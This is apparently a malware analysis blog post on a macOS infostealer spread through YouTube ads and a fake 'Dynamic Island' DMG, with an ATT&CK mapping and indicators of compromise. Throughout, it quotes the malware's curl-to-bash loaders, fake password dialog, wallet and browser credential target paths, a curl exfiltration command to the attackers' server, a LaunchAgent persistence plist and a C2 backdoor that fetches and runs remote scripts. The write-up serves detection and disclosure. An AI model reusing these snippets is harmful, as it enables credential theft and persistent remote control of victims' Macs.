MacOS Fake Dynamic Island

Youtube ads malware targeted MacOS in 2026.

I recently found a malicious YouTube ad while trying to search for an interesting video during my lunch break. Then I found some highly sophisticated macOS malware campaign distributed via malicious DMG files.

Initial Infection Vector

Delivery Method

The malware is delivered as a .dmg file distributed through the link in the youtube description, dynamichub[.]app .

Initial Execution

When we opens the DMG and runs the installer, the first-stage loader executes:

nohup curl -s https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8.pages[.]dev/yKfbGmNuw10mYJP0Tm8NuP95R1l5KTpNTuJylr70QQLYur10ePs9ZwLEqQrXrAS8ZU2[.]aspx | bash

This simple command initiates a complex multi-stage attack chain.

Attack Flow

Stages

Stage 1: Initial Loader Script

File: yKfbGmNuw10mYJP0Tm8NuP95R1l5KTpNTuJylr70QQLYur10ePs9ZwLEqQrXrAS8ZU2.aspx

Key Function:

1. Executing Throttling:

STAMP="/tmp/exec_throttle.lock"
if [[ -f "$STAMP" ]] && (( $(date +%s) - $(cat "$STAMP") < 900 )); then
    exit 0
fi
date +%s > "$STAMP"

It prevents re-executions within 15 minutes and uses an anti-analysis technique to limit sandbox detonations and reduce detection by preventing rapid, repeated executions. Therefore, the action will take longer, but it will be silent.

1. Machine/Victim Identification

WID=$(uuidgen | md5)

It generates a unique work ID for tracking this specific infection. It allows attackers to correlate data from multiple payloads and is used throughout the infection chain for victim tracking.

1. Parallel Payload Deployment

nohup curl -s https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev/MllawBCKM5JtFbYfGhSrHr8g7ubPT2yBaCgOPtxKA5bwePZ9WhZMCViuEG4J3xqTaKil[.]aspx | bash -s "$WID" > /dev/null 2>&1 &
nohup curl -s https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev/d50hjd3zlshdWpwHAGatYYWHUsTzmG5onTKAw16KK5NTbl1jvggVFgrUwXBMKRm2FdBiFpys39[.]aspx | osascript -l JavaScript - "wid:$WID" > /dev/null 2>&1 &
nohup curl -s https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev/jKY8I8tI9kkB7gurNIqpVbs7TqddHmXN7fTgD5lyP4eYKh372WMKeQtQtehpBRzrAfOGUak[.]aspx | bash > /dev/null 2>&1 &

Three payloads run at the same time in the background. Everything is sent to /dev/null to hide it, and nohup makes sure it keeps going even after the main process is done.

Stage 2A: Credentials Theft Chain

1. Phising Dialog

File: zJgrwl7UBf8kbWkfdeiWUSb7QAfI7KoDXO3c8d23Iv4J0sosBPFJHR1sgfBUr5V84IQlGt1wO5zwe.aspx (Javascript for Automation)

The attack technique is creates a convincing fake authentication dialog using macOS native APIs:

app.displayDialog("Please enter your password to continue:", {
    defaultAnswer: '',
    hiddenAnswer: true,
    buttons: ['Cancel', 'OK'],
    defaultButton: 'OK',
    withIcon: 'note'
})

It works because use legitimate macOS displayDialog API. Hide the password prompted use dots, and the user conditioned to enter the password when prompted.

Then it will loop use credential validations:

// Test password against real system authentication
app.doShellScript('/usr/bin/dscl /Local/Default -authonly "' + username + '" "' + password + '"')

It will validate the inputted password, if its correct, then it will stores as valid and exits. And if its incorrect, it will stores in invalid array, and shows error: "Incorrect password. Please try again:" . All the attempt is collected then it will send with this format:

{
  "user": "victimUsername",
  "valid": "correct_password_here",
  "invalid": ["wrong_attempt1", "wrong_attempt2", "wrong_attempt3"]
}

1. Credential Exfiltration

File: nbnusGNdcwdxTqpbKfR5HbMugXy970s92wbaJOmIL6X7hNNyVv5SEIMoaxFvoe4t6FVl2fdmg.aspx

Exfiltration Endpoint: https://fixyourallergywithus[.]com/api/credentials

It has advanced anti-analysis features:

• Proof of Work (PoW)

function solveProofOfWork(challenge, complexity) {
    const prefix = '0'.repeat(complexity);  // e.g., "0000"
    let nonce = 0;
    while (true) {
        const hash = computeSHA256(nonce + '-' + challenge);
        if (hash.startsWith(prefix)) return nonce;
        nonce++;
    }
}

The server sends the client a challenge string and a difficulty level (number of leading zeros). The client must brute-force a nonce such that:

SHA256(nonce + "-" + challenge) starts with N zeros

This is the same idea as Bitcoin mining, just scaled down. For a human or a single infected host, this cost is acceptable. For sandboxes, emulators, or large-scale automated crawlers, it’s painful. Every analysis run now burns CPU time, which dramatically slows bulk malware triage and forces analysts to either patch the logic or wait.

• Exponential backoff with jitter

const baseDelay = 60;
const exponentialDelay = baseDelay * Math.pow(2, attemptCount);
const jitter = Math.random() * exponentialDelay;
const finalDelay = baseDelay + jitter;

Once the client successfully completes the proof-of-work, the server issues a token. That token is then used for subsequent requests so the expensive challenge doesn’t need to be repeated every time. This keeps normal operation efficient while still preventing replay attacks, unauthorized submissions, or analysts trying to fake valid traffic without completing the full protocol.

Put together, this forms a stateful, adaptive handshake that is cheap for real clients but costly and inconvenient for analysts.

Stage 2B: Data Stealer

File: d50hjd3zlshdWpwHAGatYYWHUsTzmG5onTKAw16KK5NTbl1jvggVFgrUwXBMKRm2FdBiFpys39.aspx Exfiltration Endpoint: https://fixyourallergywithus[.]com/api/log

This is the primary data theft module with comprehensive targeting.

Cryptocurrency Wallet

It steals 17++ wallet applications hardcoded in the malware:

Wallet Type	Target Path	Data Stolen
Electrum	~/.electrum/wallets	Bitcoin wallet files
Electrum-LTC	~/.electrum-ltc/wallets	Litecoin wallets
Electron Cash	~/.electron-cash/wallets	Bitcoin Cash wallets
Exodus	~/Library/Application Support/Exodus	Multi-currency wallet
Ledger Live	~/Library/Application Support/Ledger Live	Hardware wallet interface
Trezor Suite	~/Library/Application Support/@trezor/suite-desktop	Hardware wallet config
Atomic Wallet	~/Library/Application Support/atomic/Local Storage/leveldb	Multi-currency wallet
Coinomi	~/Library/Application Support/Coinomi/wallets	Multi-currency mobile wallet
Guarda	~/Library/Application Support/Guarda	Multi-currency wallet
Binance	~/Library/Application Support/Binance/app-store.json	Exchange wallet config
Wasabi Wallet	~/.walletwasabi/client/Wallets	Privacy-focused Bitcoin
Bitcoin Core	~/Library/Application Support/Bitcoin/wallets	Bitcoin wallet.dat files
Dogecoin Core	~/Library/Application Support/Dogecoin/wallets	Dogecoin wallets
Litecoin Core	~/Library/Application Support/Litecoin/wallets	Litecoin wallets
DashCore	~/Library/Application Support/DashCore/wallets	Dash cryptocurrency
Monero	~/Monero/wallets	Privacy coin wallets
Tonkeeper	~/Library/Application Support/@tonkeeper/desktop/config.json	TON blockchain wallet

Browser Data Exfiltration

It targets both Chromium-based like Chrome, Brave, Edge, Opera, Vivaldi, and Firefox browsers. Extracting:

Chromium Browsers (Chrome, Brave, Edge, Opera, Vivaldi):

• Login Data - Saved passwords

• Cookies - Session tokens, authentication cookies

• History - Browsing history

• Web Data - Autofill data (addresses, credit cards)

• Bookmarks - Saved bookmarks

• Local Extension Settings - Browser extension data (including MetaMask, Phantom, etc.)

Firefox Browsers:

• logins.json - Saved passwords

• key4.db - Encryption key for password database

• cookies.sqlite - Cookie database

• places.sqlite - Bookmarks and history

• formhistory.sqlite - Form autofill data

• prefs.js - Browser preferences

• extensions.json - Installed extensions list

• moz-extension+++* directories - Extension local storage

MacOS Keychain Theft

Target: ~/Library/Keychains/login.keychain-db

It extract all saved password from Safari and macOS. Like wifi password, Email account password, Application password, etc.

Collection Process

1. Temporary Directory Creation:

mkdir -p /tmp/[random_md5]

1. Recursive File Copying:

safeCopyItem(fileManager, sourcePath, destinationPath)

• Uses macOS NSFileManager APIs

• Preserves directory structure

• Handles permission errors gracefully

1. Archive Creation:

cd /tmp && zip -r -q -y '[random].zip' '[target_dir]'

• Creates compressed ZIP archive

• Quiet mode (no output)

• Preserves symlinks (-y flag)

1. Exfiltration:

curl -s -N --fail-early -X POST \
  -A "[hardware_uuid_md5]/1.0" \
  -F 'file=@[archive].zip' \
  -F 'metadata={"wid":"[victim_id]"}' \
  'https://fixyourallergywithus[.]com/api/log?t=[token]'

1. Evidence Destruction:

rm -rf "/tmp/[archive].zip"
rm -rf "/tmp/[temp_dir]"

Stage 2C: Document and Notes Stealer

File: JtSrMgngIzUyMyBbvAOE5izvGIbbkgxCGsJw8ptyXzGqh3Y6kF7n3feSJfoDTFF1ziMU0dX.aspx Exfiltration Endpoint: https://fixyourallergywithus[.]com/api/grabber

Extracting Apple Notes

const notesApp = Application('Notes');
const folders = notesApp.folders().filter(folder => folder.notes().length > 0);

folders.forEach((folder, folderIndex) => {
    folder.notes().forEach((note, noteIndex) => {
        const content = note.name() + '\n\n' + note.plaintext();
        // Save to file
    });
});

File System Document Harvesting

It targeted at ~/Documents, ~/Downloads, and ~/Desktop with filtering it for file under 100KB only. I assume that because file below that size typically include:

• .txt files with passwords/seeds

• .key private key files

• .pem certificates

• .json configuration files with API keys

• .env environment variable files

• Small PDFs with seed phrases

• Code snippets with credentials

• SSH private keys

• GPG keys

• Wallet backup files

Permission Bypass Attempt

The malware attempts to run:

tccutil reset All

This command wipes all TCC permissions on the system, including Full Disk Access, Files and Folders access, screen recording, microphone, and camera permissions. If it were to succeed, macOS would forget which apps were previously restricted, potentially allowing the malware to re-request access or operate before protections are re-established.

Stage 2D: Pesistence

File: jKY8I8tI9kkB7gurNIqpVbs7TqddHmXN7fTgD5lyP4eYKh372WMKeQtQtehpBRzrAfOGUak.aspx Downloaded Backdoor: NRtjmyszAQorbqwFH4MD7EcZAT0fUOjDMv2GKh6QEytpN4xxNEYGPeTyUnXcIdRIzUjGyuArvBNadbE.aspx

Process

1. Hardware-based Naming

MD5HWID=$(system_profiler SPHardwareDataType | grep 'Hardware UUID' | awk '{print $NF}' | md5)

The malware fingerprints the machine by extracting the macOS Hardware UUID and hashing it with MD5. This produces a deterministic but opaque identifier unique to that device. That hash is reused everywhere: directory name, script filename, LaunchAgent label. This makes the infection host-specific, avoids hardcoded filenames, and breaks simple IOC-based detection since no two victims look the same on disk.

1. Hidden Directory Creation

APP_DIR="$HOME/Library/Application Support/${MD5HWID}"
mkdir -p "$APP_DIR"

Combined with the hash-based name, the directory blends in as something that looks like an internal app identifier rather than malware. Nothing stands out unless you already know what to look for.

1. Backdoor Download

JS_URL="https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev/NRtjmyszAQorbqwFH4MD7EcZAT0fUOjDMv2GKh6QEytpN4xxNEYGPeTyUnXcIdRIzUjGyuArvBNadbE[.]aspx"
JS_PATH="${APP_DIR}/${MD5HWID}.js"
curl -fsSL "$JS_URL" -o "$JS_PATH"
chmod +x "$JS_PATH"

It’s marked executable and staged quietly, with no user interaction. At this point, the system is already compromised, but persistence hasn’t kicked in yet.

1. LaunchAgent Persistence

PLIST_PATH="$HOME/Library/LaunchAgents/${MD5HWID}.plist"

Creates LaunchAgent with the following configuration:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 
  "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>[MD5HWID]</string>
    
    <key>ProgramArguments</key>
    <array>
        <string>/usr/bin/osascript</string>
        <string>-l</string>
        <string>JavaScript</string>
        <string>~/Library/Application Support/[MD5HWID]/[MD5HWID].js</string>
    </array>
    
    <key>RunAtLoad</key>
    <true/>
    
    <key>KeepAlive</key>
    <true/>
    
    <key>ThrottleInterval</key>
    <integer>60</integer>
    
    <key>StandardOutPath</key>
    <string>/dev/null</string>
    
    <key>StandardErrorPath</key>
    <string>/dev/null</string>
</dict>
</plist>

Persistence is achieved via a per-user LaunchAgent, not a system daemon, meaning no root access is required. The plist is again named with the HWID hash and configured to execute the backdoor using osascript with JavaScript (JXA). RunAtLoad ensures execution at login, KeepAlive respawns the process if killed, and ThrottleInterval prevents excessive restart loops that might draw attention. All stdout and stderr are redirected to /dev/null, eliminating local execution artifacts.

1. LaunchAgent Activation

launchctl load "$PLIST_PATH"
launchctl start "$PLIST_NAME"

Backdoor Functionality

1. C2 Polling Loop

// Poll every 60 seconds
const config = {
    'domain': 'https://fixyourallergywithus.com',
    'endpoint': '/api/poll',
    'pollInterval': 60
};

function pollServer(url) {
    while (true) {
        const response = sendRequest(url, 'POST', '{}', token);
        const parsed = parseResponse(response);
        
        if (parsed && parsed.task) {
            executeTask(parsed.task);
            confirmTask(url, parsed.task.id);
        }
        
        sleep(60);  // Wait 60 seconds before next poll
    }
}

1. Remote Code Execution

The backdoor supports three execution types:

• Bash Script

if (taskType === 'bash') {
    command = 'nohup curl -s "' + taskUrl + '" | bash > /dev/null 2>&1 &';
}

• Apple Script

if (taskType === 'applescript') {
    command = 'nohup curl -s "' + taskUrl + '" | osascript - > /dev/null 2>&1 &';
}

• Javascript for Automation (JXA)

if (taskType === 'javascript') {
    command = 'nohup curl -s "' + taskUrl + '" | osascript -l JavaScript - > /dev/null 2>&1 &';
}

Task Execution Flow

1. Backdoor polls C2 server

2. Server responds with task: {"url": "[payload_url]", "type": "bash", "id": 12345}

3. Backdoor downloads payload from URL

4. Executes payload with appropriate interpreter

5. Confirms successful execution to C2

6. Continues polling for next task

MITRE ATT&CK Mapping

Some MITRE ATT&CK techniques associated with this malware include:

ID	Technique	Implementation
T1566.001	Phishing: Spearphishing Attachment	Malicious DMG file distribution
T1204.002	User Execution: Malicious File	Victim opens DMG and runs installer
T1059.004	Command and Scripting: Unix Shell	Bash scripts for initial execution
T1059.002	Command and Scripting: AppleScript	osascript for payload execution
T1140	Deobfuscate/Decode Files	JavaScript obfuscation with runtime deobfuscation
T1082	System Information Discovery	Hardware UUID fingerprinting
T1033	System Owner/User Discovery	whoami command execution
T1124	System Time Discovery	Timestamp generation for execution throttle
T1005	Data from Local System	Cryptocurrency wallets, browser data
T1555.001	Credentials from Password Stores: Keychain	macOS Keychain theft
T1555.003	Credentials from Password Stores: Credentials from Web Browsers	Browser password databases
T1539	Steal Web Session Cookies	Browser cookie theft
T1056.002	Input Capture: GUI Input Capture	Fake authentication dialog
T1552.001	Unsecured Credentials: Credentials In Files	Searching for seed phrases in documents
T1119	Automated Collection	Scripted collection of wallets/browsers
T1560.001	Archive Collected Data: Archive via Utility	ZIP compression of stolen data
T1041	Exfiltration Over C2 Channel	HTTPS POST to C2 server
T1071.001	Application Layer Protocol: Web Protocols	HTTPS for C2 communication
T1573.002	Encrypted Channel: Asymmetric Cryptography	HTTPS encryption
T1543.001	Create or Modify System Process: Launch Agent	LaunchAgent persistence
T1547.011	Boot or Logon Autostart: Plist Modification	LaunchAgent plist creation
T1070.004	Indicator Removal: File Deletion	Deletes temp files after exfiltration
T1070.006	Indicator Removal: Timestomp	Potential timestamp manipulation
T1027.002	Obfuscated Files or Information: Software Packing	JavaScript obfuscation
T1497.001	Virtualization/Sandbox Evasion: System Checks	Proof-of-work anti-sandbox
T1497.003	Virtualization/Sandbox Evasion: Time Based Evasion	Execution throttling + exponential backoff
T1102	Web Service: Legitimate Service for C2	Cloudflare Pages abuse
T1219	Remote Access Software	Persistent backdoor for remote control
T1105	Ingress Tool Transfer	Downloads additional payloads via curl

Conclusion

This macOS infostealer represents a significant evolution in macOS malware sophistication. Key takeaways:

Technical Highlights

1. Multi-stage architecture enables modular, flexible operations

2. Native API abuse makes detection extremely difficult

3. Comprehensive data theft targets 17+ cryptocurrency wallets, browsers, and system credentials

4. Persistent backdoor provides long-term access with full RCE capabilities

5. Advanced evasion including proof-of-work, throttling, and obfuscation

Indicators of Compromise (IoCs)

Network Indicators

Domains:

518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev
fixyourallergywithus[.]com

URL Patterns:

https://518nqmuofg15h8wzjqpxmmxawiwituxvfarstztzg5vc1z1xf8[.]pages[.]dev/*.aspx
https://fixyourallergywithus[.]com/api/credentials
https://fixyourallergywithus[.]com/api/log
https://fixyourallergywithus[.]com/api/grabber
https://fixyourallergywithus[.]com/api/poll

File System Indicators

Malware Artifacts:

/tmp/exec_throttle.lock
~/Library/Application Support/[32-char-hex]/[32-char-hex].js
~/Library/LaunchAgents/[32-char-hex].plist

Hash Files:

2f2c83403a5fc47c10ecf827d10a260e791d2cdd32a2964912597256c9bc6f2a  DynamicHub.dmg
a841f1738c207d328d170d8cab07263ab62c715d1e513428c1ede248ea494f49  Drag into Terminal.xyz
eb80e878c13619f01190db7e5f6094ab4e366b044afd837439bb1d752a9b38d2  yKfbGmNuw10mYJP0Tm8NuP95R1l5KTpNTuJylr70QQLYur10ePs9ZwLEqQrXrAS8ZU2.aspx
a85c18dc94c4f29ac5ed6c7046c4d5028d0f2f3880d028ddc31427e93c2fe165  NRtjmyszAQorbqwFH4MD7EcZAT0fUOjDMv2GKh6QEytpN4xxNEYGPeTyUnXcIdRIzUjGyuArvBNadbE.aspx
0c72dce7dcc068b47fad0b98d419a9b63bf97ebcc6bdbdcd82e8fd9187bbd802  nbnusGNdcwdxTqpbKfR5HbMugXy970s92wbaJOmIL6X7hNNyVv5SEIMoaxFvoe4t6FVl2fdmg.aspx
ea2f15bbb2607566c1af6bc5566a6074aa457d3496503ef969fa96f9bd687cb8  zJgrwl7UBf8kbWkfdeiWUSb7QAfI7KoDXO3c8d23Iv4J0sosBPFJHR1sgfBUr5V84IQlGt1wO5zwe.aspx
c6ac11d417af9787d7e20b8a6f8e9707aa0a9d01328e83c7b573fbd4ef6032c0  JtSrMgngIzUyMyBbvAOE5izvGIbbkgxCGsJw8ptyXzGqh3Y6kF7n3feSJfoDTFF1ziMU0dX.aspx
78f95133c00b0b4f005f662be26a504d69b215c00cbcd7d3b4055a78e4d19934  jKY8I8tI9kkB7gurNIqpVbs7TqddHmXN7fTgD5lyP4eYKh372WMKeQtQtehpBRzrAfOGUak.aspx
396d1a9e51b17659248b78a6fac49ec92eb86cd6b081c3a74a3f929348d491b1  d50hjd3zlshdWpwHAGatYYWHUsTzmG5onTKAw16KK5NTbl1jvggVFgrUwXBMKRm2FdBiFpys39.aspx
d251def5e1df0d52f6573d82c27c001d9d4a47ee94c201fa1efb66f9ab32322c  MllawBCKM5JtFbYfGhSrHr8g7ubPT2yBaCgOPtxKA5bwePZ9WhZMCViuEG4J3xqTaKil.aspx